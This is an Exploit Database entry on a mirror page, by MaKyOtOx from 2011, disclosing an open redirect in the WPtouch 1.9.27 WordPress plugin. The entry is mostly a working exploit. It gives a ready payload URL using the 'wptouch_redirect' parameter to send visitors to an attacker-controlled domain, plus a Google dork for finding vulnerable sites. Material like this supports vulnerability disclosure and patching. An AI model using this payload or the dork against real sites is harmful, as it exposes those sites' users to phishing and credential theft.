WordPress Plugin WPtouch 1.9.27 – URL redirection

• Exploit Database
• 108 阅读

• 作者： MaKyOtOx
  日期： 2011-06-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17423/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  Hello , that's a 0day on the must downloaded WordPress plugin.   # Exploit Title: 0-Day WPtouch WordPress Plugin 1.9.27 URL redirection # Google Dork: intext:"Powered by WordPress + WPtouch" (with iphone/android User-Agent) # Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoins) # Date: 20/06/2011 # Software Link: http://wordpress.org/extend/plugins/wptouch/ # Version: 1.9.27 (not tested on previous versions) # Tested on: WhatEver OS # CVE : 0-Day   http://site.com/?wptouch_view=normal&wptouch_redirect=.attacker-site.com   # It would redirect to : http://site.com.attacker-site.com :)